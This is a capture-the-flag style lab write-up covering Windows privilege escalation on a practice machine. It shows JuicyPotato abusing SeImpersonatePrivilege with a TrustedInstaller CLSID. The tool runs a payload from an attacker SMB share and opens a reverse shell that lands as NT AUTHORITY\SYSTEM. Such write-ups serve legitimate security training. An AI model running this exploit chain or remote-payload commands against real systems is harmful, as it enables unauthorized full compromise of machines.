JuicyPotato
The current user, apache, is a service account and has SeImpersonatePrivilege enabled.
Given the target system is very old and runs on x86 architecture, I can try to use JuicyPotato
C:\tmp> \\192.168.45.245\smb\JuicyPotato.x86.exe -t * -p "\\192.168.45.245\smb\pe.exe" -l 12345
Testing {4991D34B-80A1-4291-B697-000000000000} 12345
COM -> recv failed with error: 10038Initial execution fail with an error. This error usually occurs with an execution is made with a CLSID that isn’t present in the target system.
Find A CLSID
/Practice/AuthBy/5-Privilege_Escalation/attachments/{8E97039E-8CC1-4ADE-8595-7CBC4A77477C}.png)
There is an online tool that lists CLSIDs by the version
/Practice/AuthBy/5-Privilege_Escalation/attachments/{26EE3F49-3046-47F6-97F6-4C322D8E07C2}.png)
An instance of TrustedInstaller, was identified during the manual enumeration.
This can be leveraged.
Exploitation
C:\tmp> \\192.168.45.245\smb\JuicyPotato.x86.exe -t * -l 11111 -p "\\192.168.45.245\smb\pe.exe" -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}"
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 11111
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OKUsing one of the CLSIDs of TrustedInstaller works executing the payload via the on-memory method
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ nnc 8080
listening on [any] 8080 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.221.46] 49387
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
LIVDA
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::f03d:1dc2:6436:3997%12
IPv4 Address. . . . . . . . . . . : 192.168.221.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.221.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : System level compromise